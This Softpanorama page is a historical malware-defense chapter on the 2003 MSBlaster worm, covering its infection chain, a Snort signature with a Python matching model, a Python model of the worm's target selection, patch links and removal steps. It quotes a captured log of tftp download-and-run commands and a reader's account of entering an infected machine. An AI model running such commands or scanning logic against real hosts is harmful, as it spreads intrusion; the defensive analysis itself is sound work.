Malware Defense History

by Dr. Nikolai Bezroukov.

Copyright: Dr. Nikolai Bezroukov 1994-2013. Unpublished notes. Version 0.80.October, 2013

Contents : Foreword : Ch01 : Ch02 : Ch03  : Ch04 : Ch05 : Ch06 : Ch07 : Ch08 : Ch09 : Ch10 : Ch11 : Ch12 : Ch13


Chapter 7: Network worms

MSBlaster Worm

  1. Old News

  2. Recommended Links

  3. Manual removal instructions

Abstract

The Blaster worm uses a series of components to infect a host. The first component is a publicly available RPC DCOM exploit that binds a SYSTEM-level command shell to TCP port 4444. This exploit opens a command channel between the infecting agent and the vulnerable target. Once the target is compromised, the worm transfers the msblast.exe executable (the main body of the worm) to it via TFTP and runs it. The payload used in the public DCOM exploit, as well as the TFTP functionality, are both encapsulated within msblast.exe.

Existing RPC DCOM Snort signatures will detect this worm. The exploit code is based on dcom.c, the public proof-of-concept exploit for MS03-026.

Infection sequence:

  1. SOURCE sends packets to TCP port 135 on TARGET carrying a variant of the dcom.c exploit.

  2. The overflow gives SOURCE a remote command shell on TCP port 4444 of TARGET.

  3. Through that shell SOURCE sends the command "tftp -i SOURCE GET msblast.exe" followed by "start msblast.exe".

  4. TARGET connects back to the TFTP server (UDP port 69) that the worm runs on SOURCE, downloads msblast.exe and executes it. TARGET is now a SOURCE for the next round.


Old News ;-)

The existing RPC/DCOM signature in the open-source Snort intrusion detection system will detect this worm as it enters a monitored network. Symantec provided another Snort signature, listed below (see their analysis report):

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 \
(msg:"DCE RPC Interface Buffer Overflow Exploit"; \
content:"|00 5C 00 5C|"; \
content:!"|5C|"; within:32; \
flow:to_server,established; \
reference:bugtraq,8205; rev: 1; )

The rule fires on an established client-to-server stream to TCP port 135 that carries the UTF-16LE sequence "\\" (bytes 00 5C 00 5C, the start of a UNC path) with no further backslash in the following 32 bytes, i.e. a UNC path whose machine-name component is longer than 15 UTF-16 characters. A legitimate NetBIOS name is at most 15 characters, so the second backslash of \\server\share normally falls inside that window; the dcom.c exploit instead supplies an oversized machine name that overflows the fixed-size buffer in the RPCSS DCOM activation code. Paths built from long DNS host names can trip the rule as well, so a hit on a patched network should be verified rather than assumed.
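The matching logic of the Symantec rule, as an added Python model for checking what the signature will and will not flag. This is an added example, not code from the original page, Symantec or the Snort project; the sample payloads are constructed here (UTF-16LE UNC paths and a few DCERPC header bytes), not captured traffic, and the only Snort behaviour modelled is the two content matches and the "within" window.

```python
"""Model of the Symantec Snort rule quoted above:

    content:"|00 5C 00 5C|"; content:!"|5C|"; within:32;

A match is a UTF-16LE "\\\\" (start of a UNC path) that is NOT followed by
another backslash (0x5C) in the next 32 bytes, i.e. a machine-name component
longer than 15 UTF-16 characters.  Sample payloads below are constructed for
the example and are not captured traffic.
"""

MARKER = b"\x00\x5c\x00\x5c"   # |00 5C 00 5C|
WINDOW = 32                    # within:32


def rule_matches(payload: bytes) -> bool:
    """Return True if the rule would fire on this client->server payload.

    Like Snort, retry later occurrences of the first content when the negated
    second content fails on an earlier one (a stream may carry several paths).
    """
    start = 0
    while True:
        i = payload.find(MARKER, start)
        if i < 0:
            return False
        after = i + len(MARKER)
        if b"\x5c" not in payload[after:after + WINDOW]:
            return True          # no backslash within 32 bytes: oversized name
        start = i + 1            # backtrack to the next candidate marker


def unc_path_utf16(machine: str, rest: str = "\\c$\\x.txt") -> bytes:
    """UTF-16LE encoding of \\\\<machine><rest>, preceded by the null high byte
    of whatever character came before it, so the |00 5C 00 5C| marker lines up."""
    return b"\x00" + ("\\\\" + machine + rest).encode("utf-16-le")


# Constructed samples (assumptions for the example, not observed data)
BENIGN_UNC = unc_path_utf16("FILESERVER01")           # 12-char NetBIOS name
MAX_NETBIOS = unc_path_utf16("A" * 15)                # longest legal NetBIOS name
LONG_MACHINE_NAME = unc_path_utf16("A" * 64)          # dcom.c-style oversized name
NO_UNC_AT_ALL = b"\x05\x00\x0b\x03\x10\x00\x00\x00"   # DCERPC bind header bytes only
TWO_PATHS = BENIGN_UNC + b"\x00\x00" + LONG_MACHINE_NAME


def classify(samples: dict) -> dict:
    """Name -> would the rule alert."""
    return {name: rule_matches(p) for name, p in samples.items()}


if __name__ == "__main__":
    samples = {
        "benign_unc": BENIGN_UNC,
        "max_netbios": MAX_NETBIOS,
        "long_name": LONG_MACHINE_NAME,
        "no_unc": NO_UNC_AT_ALL,
        "two_paths": TWO_PATHS,
    }
    for name, hit in classify(samples).items():
        print("%-12s alert=%s" % (name, hit))
```

The 32-byte window is exactly 16 UTF-16 characters, one more than the NetBIOS limit, which is why a 15-character name stays quiet and a 16-character one alerts; the flow and port conditions of the real rule are not modelled, so feed this only bytes already known to be client-to-server traffic on port 135.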

Microsoft has released a scanning tool, KB823980scan.exe, that can be used to scan networks to identify hosts that do not have the 823980 security patch (MS03-026) installed.

For additional information about the security patch (MS03-026), see Knowledge Base article 823980.

Sniffing my connection, I detected a new worm propagating via the RPC DCOM overflow.

I saw a couple of connections trying to connect to my port 4444, so I did a little listen on it:
---------
tftp -i 142.217.249.63 GET msblast.exe
tftp -i 142.217.242.78 GET msblast.exe
start msblast.exe
msblast.exe
start msblast.exe
msblast.exe
tftp -i 142.217.247.115 GET msblast.exe
start msblast.exe
msblast.exe
tftp -i 142.217.254.164 GET msblast.exe
tftp -i 142.217.228.200 GET msblast.exe
start msblast.exe
msblast.exe
tftp -i .... and it continues...

------------------------------

So I got into one of those computers with the RPC overflow and downloaded MSBLAST.exe.
I installed it.
It begins the scan at 108.41.62.1-255 on port 135.

And it puts itself into the registry at startup:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\windows auto update "msblast.exe"

The worm exploits the DCOM RPC vulnerability in Microsoft Windows described in Microsoft Security Bulletin MS03-026.

It is written in C using the LCC compiler. The worm is a Windows PE EXE file of about 6KB (compressed with UPX; 11KB when decompressed). On the victim, Lovesan arrives as a file named msblast.exe, which the infecting host makes the victim download and run.

The worm body contains the following text strings:

I just want to say LOVE YOU SAN!!
billy gates why do you make this possible? Stop making money and fix your software!!

Symptoms of Infection:

MSBLAST.EXE in the Windows system32 folder.
An error message about an RPC service failure, followed by a reboot: exploit attempts that do not land cleanly crash the RPC service, and on Windows XP and 2000 that crash makes the system restart.

How the Worm Spreads

Lovesan registers itself in the Run key so that it is launched on every subsequent reboot:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
windows auto update="msblast.exe"

The worm then scans for targets 20 IP addresses at a time: it attempts to connect to 20 addresses, sleeps for 1.8 seconds, and scans the next 20. The starting address of a scan run (A.B.C.D, always with D = 0) is chosen in one of two ways:

In 3 out of 5 cases Lovesan picks a random base: A, B and C are random numbers between 0 and 255, and D is 0.

In the remaining 2 out of 5 cases Lovesan derives the base from the infected machine's own IP address: A and B are taken from the local address, D is set to 0, and C is computed as follows.

If C is less than or equal to 20, C is kept as is. Thus, if the local IP address is 207.46.14.1, the worm scans addresses starting from 207.46.14.0.

If C is greater than 20, Lovesan selects a random value between C-19 and C. Thus, if the IP address of the infected machine is 207.46.134.191, the worm scans addresses starting from 207.46.{115-134}.0.

The worm sends the buffer-overrun request to each reachable machine on TCP port 135. On a vulnerable machine the exploit payload starts a command shell listening on TCP port 4444. Lovesan also runs a thread that serves the worm body over TFTP (UDP port 69). It connects to the victim's shell on port 4444 and sends a "tftp -i <infecting host> GET msblast.exe" command followed by "start msblast.exe", so the victim downloads the worm from the infecting machine and runs it. The victim is now infected and starts scanning in turn.
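The target-selection rules above, as an added Python model. This is example code written for this page, not the worm's code and not from the original description. It assumes that a run walks sequentially upward from the chosen base (the description's "scans the next 20 IP addresses") with a plain 32-bit increment; the "probe" callback stands in for the TCP/135 connect attempt, so nothing on the network is contacted, and the 1.8-second pause is off by default.

```python
"""Model of the Lovesan/Blaster target-selection logic described above.
Added example, not worm code.  `probe` is a caller-supplied stand-in for the
TCP/135 connect attempt, so nothing on the network is touched."""

import ipaddress
import random
import time

BATCH_SIZE = 20       # addresses probed per batch
BATCH_PAUSE_S = 1.8   # sleep between batches
RPC_PORT = 135        # the port each probe would target


def random_base(rng):
    """3 of 5 runs: A, B, C are random 0..255, D is forced to 0."""
    a, b, c = (rng.randrange(256) for _ in range(3))
    return "%d.%d.%d.0" % (a, b, c)


def local_base(local_ip, rng):
    """2 of 5 runs: keep A.B of the host's own address; keep C when C <= 20,
    otherwise draw C uniformly from [C-19, C]; D is 0."""
    a, b, c, _ = (int(x) for x in local_ip.split("."))
    if c > 20:
        c = rng.randint(c - 19, c)
    return "%d.%d.%d.0" % (a, b, c)


def choose_base(local_ip, rng):
    """Return (kind, base): kind is "random" 3 times in 5, "local" 2 times in 5."""
    if rng.randrange(5) < 3:
        return "random", random_base(rng)
    return "local", local_base(local_ip, rng)


def batch_from(start, count=BATCH_SIZE):
    """`count` consecutive addresses from `start`, carrying into the next /24
    and wrapping at 255.255.255.255 like a 32-bit increment (assumption)."""
    first = int(ipaddress.IPv4Address(start))
    return [str(ipaddress.IPv4Address((first + i) & 0xFFFFFFFF)) for i in range(count)]


def scan(local_ip, rng, batches, probe=lambda ip: False, pause=False):
    """Sweep `batches` consecutive batches from one chosen base.
    Returns (base, probed, hits); `probe(ip)` returns True when TCP/135 answered."""
    _, base = choose_base(local_ip, rng)
    cursor = int(ipaddress.IPv4Address(base))
    probed, hits = [], []
    for _ in range(batches):
        start = str(ipaddress.IPv4Address(cursor & 0xFFFFFFFF))
        for ip in batch_from(start):
            probed.append(ip)
            if probe(ip):
                hits.append(ip)
        cursor += BATCH_SIZE
        if pause:
            time.sleep(BATCH_PAUSE_S)
    return base, probed, hits


def probes_per_second():
    """Steady-state SYN rate to TCP/135 from one infected host (about 11/s)."""
    return BATCH_SIZE / BATCH_PAUSE_S


if __name__ == "__main__":
    rng = random.Random(2003)
    base, probed, hits = scan("207.46.134.191", rng, batches=3,
                              probe=lambda ip: ip.endswith(".5"))
    print("base", base, "probed", len(probed), "answered", hits)
```

Two things fall out of the model that matter for detection: the 2-in-5 "local" branch means an infected host spends a large share of its time sweeping the /24s just below its own, which is why a single infected laptop floods its own LAN segment; and 20 SYNs every 1.8 seconds to port 135 with strictly sequential destination addresses is a steady, distinctive rate for a threshold rule in Snort or a flow collector.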


PSS Security Response Team Alert - New Worm: W32.Blaster.worm

SEVERITY: CRITICAL

DATE: Updated August 12, 2003

PRODUCTS AFFECTED: Windows XP, Windows 2000, Windows Server 2003, Windows NT 4.0, NT 4.0 Terminal Services Edition

WHAT IS IT?

The Microsoft Product Support Services Security Team is issuing this alert to inform customers about a new worm named W32.Blaster.Worm which is spreading in the wild. This virus is also known as: W32/Lovsan.worm (McAfee), WORM_MSBLAST.A (Trendmicro), Win32.Posa.Worm (Computer Associates). Best practices, such as applying security patch MS03-026 should prevent infection from this worm.

Date discovered: August 11, 2003. Customers who had previously applied the security patch MS03-026 are protected. To determine if the virus is present on your machine see the technical details below.

IMPACT OF ATTACK:

Spreads through open RPC ports (TCP 135). Symptoms: the customer's machine reboots by itself, or the file "msblast.exe" is present on the system.

TECHNICAL DETAILS:

This worm scans a random IP range to look for vulnerable systems on TCP port 135. The worm attempts to exploit the DCOM RPC vulnerability patched by MS03-026.

Once the exploit code is delivered to a system, that system downloads and executes the file MSBLAST.EXE from the attacking host via TFTP. Once run, the worm creates the registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "windows auto update" = msblast.exe. The worm body also contains the text strings quoted earlier on this page ("I just want to say LOVE YOU SAN!!" and the message addressed to "billy gates").

Symptoms of the virus: Some customers may not notice any symptoms at all. A typical symptom is the system is rebooting every few minutes without user input. Customers may also see:

- Presence of unusual TFTP* files
- Presence of the file msblast.exe in the WINDOWS SYSTEM32 directory

To detect this virus, search for msblast.exe in the WINDOWS SYSTEM32 directory or download the latest anti-virus software signature from your anti-virus vendor and scan your machine.

For additional information on recovering from this attack please contact your preferred anti-virus vendor.

RECOVERY:

Many Antivirus companies have written tools to remove the known exploit associated with this particular worm. To download the removal tool from your antivirus vendor follow procedures outlined below.

For Windows XP

First, enable the built-in firewall, Internet Connection Firewall (ICF), in Windows XP: http://support.microsoft.com/?id=283673

--In Control Panel, double-click "Networking and Internet Connections", and then click "Network Connections".

--Right-click the connection on which you would like to enable ICF, and then click "Properties".

--On the Advanced tab, click the box to select the option to "Protect my computer or network".

Second, download the MS03-026 security patch from Microsoft:

Windows XP (32 bit)

http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-aaee-b7a52a983f01/WindowsXP-KB823980-x86-ENU.exe

Windows XP (64 bit)

http://download.microsoft.com/download/a/7/5/a75b3c8f-5df0-451b-b526-cfc7c5c67df5/WindowsXP-KB823980-ia64-ENU.exe

Third, install or update your antivirus signature software

Then, download the worm removal tool from your antivirus vendor.

For Windows 2000 systems, where Internet Connection Firewall (ICF) is not available, the following steps will help block the affected ports so that the system can be patched. These steps are based on a modified excerpt from the article HOW TO: Configure TCP/IP Filtering in Windows 2000, http://support.microsoft.com/?id=309798

1. Configure TCP/IP security on Windows 2000:

--Select "Network and Dial-up Connections" in the control panel.

--Right-click the interface you use to access the Internet, and then click "Properties".

--In the "Components checked are used by this connection" box, click "Internet Protocol (TCP/IP)", and then click "Properties".

--In the Internet Protocol (TCP/IP) Properties dialog box, click "Advanced".

--Click the "Options" tab.

--Click "TCP/IP filtering", and then click "Properties".

--Select the "Enable TCP/IP Filtering (All adapters)" check box.

--There are three columns with the following labels:

TCP Ports

UDP Ports

IP Protocols

--In each column, select the "Permit Only" option. With nothing in the lists, "Permit Only" blocks inbound connections to every TCP and UDP port on the adapter, which is the intent while the patch is applied; if you administer the machine remotely, add the port you use (for example TCP 3389 for Terminal Services) to the TCP list first, and remove the filter again once the system is patched.

--Click OK.

2. Download the MS03-026 security patch for Windows 2000 from Microsoft at: http://download.microsoft.com/download/0/1/f/01fdd40f-efc5-433d-8ad2-b4b9d42049d5/Windows2000-KB823980-x86-ENU.exe

3. Install or update your antivirus signature software

4. Then, download the worm removal tool from your antivirus vendor.

For additional details on this worm from anti-virus software vendors participating in the Microsoft Virus Information Alliance (VIA), see the vendor links in the Recommended Links section below, or contact your antivirus vendor.

PREVENTION:

Turn on Internet Connection Firewall (Windows XP or Windows Server 2003) or use a third-party firewall to block TCP ports 135, 139, 445 and 593; UDP ports 135, 137 and 138; and also UDP port 69 (TFTP) and TCP port 4444 (the remote command shell). Note that blocking TCP 4444 and UDP 69 alone only stops an exploited host from fetching the worm body; the exploit attempt on port 135 still crashes the RPC service and reboots an unpatched machine, so block 135 inbound and apply the patch. To enable the Internet Connection Firewall in Windows: http://support.microsoft.com/?id=283673

This worm utilizes a previously-announced vulnerability as part of its infection method. Because of this, customers must ensure that their computers are patched for the vulnerability that is identified in Microsoft Security Bulletin MS03-026. http://www.microsoft.com/technet/security/bulletin/MS03-026.asp.

Install the patch MS03-026 from Windows Update:

Windows NT 4 Server & Workstation

http://download.microsoft.com/download/6/5/1/651c3333-4892-431f-ae93-bf8718d29e1a/Q823980i.EXE

Windows NT 4 Terminal Server Edition

http://download.microsoft.com/download/4/6/c/46c9c414-19ea-4268-a430-53722188d489/Q823980i.EXE

Windows 2000

http://download.microsoft.com/download/0/1/f/01fdd40f-efc5-433d-8ad2-b4b9d42049d5/Windows2000-KB823980-x86-ENU.exe

Windows XP (32 bit)

http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-aaee-b7a52a983f01/WindowsXP-KB823980-x86-ENU.exe

Windows XP (64 bit)

http://download.microsoft.com/download/a/7/5/a75b3c8f-5df0-451b-b526-cfc7c5c67df5/WindowsXP-KB823980-ia64-ENU.exe

Windows 2003 (32 bit)

http://download.microsoft.com/download/8/f/2/8f21131d-9df3-4530-802a-2780629390b9/WindowsServer2003-KB823980-x86-ENU.exe

Windows 2003 (64 bit)

http://download.microsoft.com/download/4/0/3/403d6631-9430-4ff6-a061-9072a4c50425/WindowsServer2003-KB823980-ia64-ENU.exe

As always, please make sure to use the latest Anti-Virus detection from your Anti-Virus vendor to detect new viruses and their variants.

RELATED KB'S:
http://support.microsoft.com/?kbid=826955

RELATED MICROSOFT SECURITY BULLETINS:
http://www.microsoft.com/technet/security/bulletin/MS03-026.asp

RELATED LINKS:
http://www.microsoft.com/security/incident/blast.asp

If you have any questions regarding this alert please contact your Microsoft representative or 1-866-727-2338 (1-866-PCSafety) within the US, outside of the US please contact your local Microsoft Subsidiary.

PSS Security Response Team

Recommended Links

Sites

CERT Advisory CA-2003-20 W32/Blaster worm

Microsoft RPC Exploit and W32.Blaster.Worm

Network Associates:
http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=100547

Trend Micro:
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A

Symantec:
http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html

Computer Associates:
http://www3.ca.com/virusinfo/virus.aspx?ID=36265

For more information on Microsoft's Virus Information Alliance please visit this link:
http://www.microsoft.com/technet/security/virus/via.asp

Microsoft TechNet

Manual removal instructions

1. Look for "msblast.exe" in Task Manager. If it is running, end the process first: Windows will not let you delete an executable that is still running.
2. Delete the registry value found at:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: "windows auto update"
String: "msblast.exe"
3. Delete the file "msblast.exe" found at %systemroot%\system32\msblast.exe
4. Install the MS03-026 patch (or at least block inbound TCP 135) before putting the machine back on the network; an unpatched host is reinfected within minutes by the scanning traffic described above.

You can also use a free clean-up tool provided by Symantec. Shavlik Technologies also provides a free version of its HFNetChk Lite software, which can scan your entire network for missing Microsoft patches and automate patch installation for up to 50 systems.

Tobias E. Schmidt of Winona University posted two visual basic scripts that can be used to help control the worm while patches are rolled out and to help clean up infected systems. The scripts can be inserted into computer startup and user logon sequences using Group Policy.

The number of systems scanning for an open port 135, which the worm uses to spread, has been considerably higher since Microsoft released its security bulletin on July 16. Trends show that since then the number of hosts performing scans has increased dramatically: before July 16 there were roughly 900 to 1,100 systems scanning for port 135, while as of August 11 there were over 58,900, many of them probably infected with the new worm.

Etc

To monitor the situation be sure to visit Incidents.org or Dshield.org regularly, where you can learn more about the worm, as well as learn about general trends and patterns of many different intrusion attempts.

On Monday, a few minutes after news of the new worm spread to the Bugtraq mailing list, an anonymous user posting from a Hotmail address sent the list a message containing a link to another set of exploit code for the RPC/DCOM problem. The zip file contains a copy of the source code, a compiled executable, and a macro file that can be used once the exploit has inserted a backdoor command shell into an infected system. The code, called KaHT II, is capable of spreading itself to other systems rapidly.

You can also read more about the RPC/DCOM vulnerability in other articles on our Web site, and find links to Snort and its accessories listed below:


Buffer Overrun In RPC Interface Could Allow Code Execution

More technical details, how to defend your systems, and user reports regarding patch installation issues:

UPDATE: MS Patches Leave Systems Insecure and Break Services

Commentary and other details:

Are You Vulnerable to RPC Exploitation?

Commentary and other details:

The RPC/DCOM Bugs: How Bad Are They?

Snort IDS - Win32 Version; and IDSCenter (GUI for Snort)

Download Snort for Win32 platforms

Download IDSCenter (from Engage Security)

Download the latest Snort Rulesets

Read Windows & .NET Magazine articles about Snort


Copyright © 1996-2021 by Softpanorama Society. www.softpanorama.org was initially created as a service to the (now defunct) UN Sustainable Development Networking Programme (SDNP) without any remuneration. This document is an industrial compilation designed and created exclusively for educational use and is distributed under the Softpanorama Content License. Original materials copyright belong to respective owners. Quotes are made for educational purposes only in compliance with the fair use doctrine.

FAIR USE NOTICE This site contains copyrighted material the use of which has not always been specifically authorized by the copyright owner. We are making such material available to advance understanding of computer science, IT technology, economic, scientific, and social issues. We believe this constitutes a 'fair use' of any such copyrighted material as provided by section 107 of the US Copyright Law according to which such material can be distributed without profit exclusively for research and educational purposes.

This is a Spartan WHYFF (We Help You For Free) site written by people for whom English is not a native language. Grammar and spelling errors should be expected. The site contain some broken links as it develops like a living tree...

You can use PayPal to to buy a cup of coffee for authors of this site

Disclaimer:

The statements, views and opinions presented on this web page are those of the author (or referenced source) and are not endorsed by, nor do they necessarily reflect, the opinions of the Softpanorama society. We do not warrant the correctness of the information provided or its fitness for any purpose. The site uses AdSense so you need to be aware of Google privacy policy. You you do not want to be tracked by Google please disable Javascript for this site. This site is perfectly usable without Javascript.

Last modified: March 12, 2019